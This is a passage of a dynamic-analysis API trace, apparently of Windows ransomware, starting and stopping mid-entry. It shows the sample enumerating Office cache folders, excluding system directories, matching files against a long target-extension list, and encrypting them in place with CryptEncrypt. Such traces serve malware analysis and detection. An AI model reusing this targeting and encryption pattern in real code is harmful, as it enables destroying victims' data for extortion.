dwNumberOfBytesToFlush=0x900) returned 1 [0020.533] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.533] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0020.533] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x922) returned 0xa0000 [0020.534] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0020.534] CryptHashData (hHash=0x368430, pbData=0xa08fc, dwDataLen=0x4, dwFlags=0x0) returned 1 [0020.534] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0020.534] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0020.534] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x922) returned 1 [0020.534] LocalFree (hMem=0x36ea40) returned 0x0 [0020.534] CryptDestroyHash (hHash=0x368430) returned 1 [0020.534] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.535] CloseHandle (hObject=0x230) returned 1 [0020.535] CloseHandle (hObject=0x22c) returned 1 [0020.535] CryptDestroyKey (hKey=0x3683b0) returned 1 [0020.535] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0020.535] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0020.535] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0020.536] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0020.536] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-0018-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C" [0020.536] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0020.536] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0020.536] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0020.536] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0020.536] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*" [0020.536] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0020.537] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0020.537] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0020.537] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0020.537] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0020.537] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0020.537] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", pszFile="PowerPointMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" [0020.537] PathFindExtensionW (pszPath="PowerPointMUI.msi") returned=".msi" [0020.537] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0020.537] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0020.537] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0020.537] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", pszFile="PowerPointMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" [0020.537] PathFindExtensionW (pszPath="PowerPointMUI.xml") returned=".xml" [0020.537] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0020.537] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0020.537] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0020.538] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1450) returned 1 [0020.538] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5d2, lpName=0x0) returned 0x230 [0020.538] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0020.538] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0xa0000 [0020.539] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.539] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0xa0000 [0020.539] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000, pdwDataLen=0x31ce070*=0x5aa, dwBufLen=0x5b0 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x5b0) returned 1 [0020.539] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5b0) returned 1 [0020.541] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.541] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0020.542] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5d2) returned 0xa0000 [0020.542] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0020.542] CryptHashData (hHash=0x368430, pbData=0xa05ac, dwDataLen=0x4, dwFlags=0x0) returned 1 [0020.543] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0020.543] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0020.543] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5d2) returned 1 [0020.543] LocalFree (hMem=0x36ea40) returned 0x0 [0020.543] CryptDestroyHash (hHash=0x368430) returned 1 [0020.543] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.543] CloseHandle (hObject=0x230) returned 1 [0020.543] CloseHandle (hObject=0x22c) returned 1 [0020.544] CryptDestroyKey (hKey=0x3683b0) returned 1 [0020.544] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0020.544] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0020.544] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", pszFile="PptLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" [0020.544] PathFindExtensionW (pszPath="PptLR.cab") returned=".cab" [0020.544] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0020.544] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0020.544] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0020.545] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=70361744) returned 1 [0020.545] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x431a2b2, lpName=0x0) returned 0x230 [0020.545] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0020.545] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x4310000, dwNumberOfBytesToMap=0xa290) returned 0xa0000 [0020.547] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0020.548] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1000000) returned 0x3240000 [0020.549] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000, dwBufLen=0x431a290 | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000) returned 1 [0020.944] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x1000000) returned 1 [0021.064] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0021.150] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0021.150] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x4310000, dwNumberOfBytesToMap=0xa2b2) returned 0xa0000 [0021.151] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0021.151] CryptHashData (hHash=0x368430, pbData=0xaa28c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0021.151] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0021.151] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0021.151] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0xa2b2) returned 1 [0021.152] LocalFree (hMem=0x36ea40) returned 0x0 [0021.152] CryptDestroyHash (hHash=0x368430) returned 1 [0021.152] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.152] CloseHandle (hObject=0x230) returned 1 [0021.152] CloseHandle (hObject=0x22c) returned 1 [0021.338] CryptDestroyKey (hKey=0x3683b0) returned 1 [0021.338] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0021.338] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.338] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" [0021.338] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0021.338] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0021.339] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0021.339] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0021.339] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1886) returned 1 [0021.339] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x782, lpName=0x0) returned 0x230 [0021.339] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0021.339] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x75e) returned 0xa0000 [0021.342] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.343] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x75e) returned 0xa0000 [0021.343] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000, pdwDataLen=0x31ce070*=0x75e, dwBufLen=0x760 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x760) returned 1 [0021.344] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x760) returned 1 [0021.375] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.375] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0021.375] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x782) returned 0xa0000 [0021.376] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0021.376] CryptHashData (hHash=0x368430, pbData=0xa075c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0021.376] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0021.376] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0021.376] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x782) returned 1 [0021.377] LocalFree (hMem=0x36ea40) returned 0x0 [0021.377] CryptDestroyHash (hHash=0x368430) returned 1 [0021.377] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0021.377] CloseHandle (hObject=0x230) returned 1 [0021.377] CloseHandle (hObject=0x22c) returned 1 [0021.378] CryptDestroyKey (hKey=0x3683b0) returned 1 [0021.378] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0021.378] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0021.378] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0021.378] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.378] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-0019-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C" [0021.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0021.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0021.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0021.378] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0021.379] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*" [0021.379] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0021.380] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.380] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0021.380] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.380] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0021.380] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.380] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", pszFile="PublisherMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" [0021.380] PathFindExtensionW (pszPath="PublisherMUI.msi") returned=".msi" [0021.380] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0021.380] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0021.380] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0021.380] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", pszFile="PublisherMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" [0021.380] PathFindExtensionW (pszPath="PublisherMUI.xml") returned=".xml" [0021.380] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0021.380] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0021.380] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all 